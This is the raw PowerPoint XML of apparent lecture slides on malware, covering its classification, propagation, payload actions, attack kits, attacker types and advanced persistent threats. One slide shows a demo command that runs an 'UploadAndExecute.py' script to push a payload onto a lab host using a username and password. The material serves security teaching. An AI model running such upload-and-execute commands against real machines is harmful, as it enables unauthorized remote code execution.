            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/hacked”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="6400800"/>
            <a:ext cx="8495986" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UploadAndExecute.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 192.168.1.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 1234vm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Payload.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37246890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GB" b="1" dirty="0">
                <a:ln w="18415" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Classification of Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Classified into two broad categories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ased </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>first on how it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spreads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>propagates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to reach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>desired targets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>hen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>actions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>performs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>a target is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Also classified by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>hose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that need a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(parasitic code such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>hose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that are independent, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>self-contained programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>worms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, and bots)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>alware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that does not replicate (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and spam e-mail)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>alware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>replicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (viruses and worms)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29742122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Propagation Mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infection of existing content by viruses that is subsequently spread to other systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit of software vulnerabilities by worms or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>drive-by-downloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to allow the malware to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replicate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Downloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>which a person authorized but without understanding the consequences (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. downloads which install an unknown or counterfeit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Executable program"/>
              </a:rPr>
              <a:t>executable program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="ActiveX"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> component, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4" tooltip="Java (software platform)"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> applet).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId5" tooltip="Download"/>
              </a:rPr>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> that happens without a person's knowledge, often a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6" tooltip="Computer virus"/>
              </a:rPr>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId7" tooltip="Spyware"/>
              </a:rPr>
              <a:t>spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId8" tooltip="Malware"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId9" tooltip="Crimeware"/>
              </a:rPr>
              <a:t>crimeware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Social </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>engineering attacks that convince users to bypass security mechanisms to install Trojans or to respond to phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245099465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Payload Actions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Corruption of system or data files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Theft of service/make the system a zombie agent of attack as part of a botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Theft of information from the system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keylogging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealthing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/hiding its presence on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373836408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Kits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Initially, development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and deployment of malware required considerable technical skill by software authors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>of virus-creation toolkits in the early 1990s and then more general attack kits in the 2000s greatly assisted in the development and deployment of malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Toolkits are often known as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>a variety of propagation mechanisms and payload modules that even novices can deploy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>variants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that can be generated by attackers using these toolkits creates a significant problem for those defending systems against them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Widely used toolkits include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Zeus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Blackhole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sakura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Phoenix </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34556532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Sources</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Another significant malware development is the change from attackers being individuals often motivated to demonstrate their technical competence to their peers to more organized and dangerous attack sources such as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Politically motivated attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Criminals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Organized crime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Organizations that sell their services to companies and nations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>National government </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>agencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This has significantly changed the resources available and motivation behind the rise of malware and has led to development of a large underground economy involving the sale of attack kits, access to compromised hosts, and to stolen information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28252389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00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advanced Persistent Threats (APTs)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Well-resourced, persistent application of a wide variety of intrusion technologies and malware to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>selected targets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(usually business or political)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Typically attributed to criminal enterprises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Differ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>from other types of attack by their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>careful target selection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>and stealthy intrusion efforts over extended periods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>High profile attacks include Aurora, RSA, APT1, and </a:t>
            </a:r>
            <a:r>
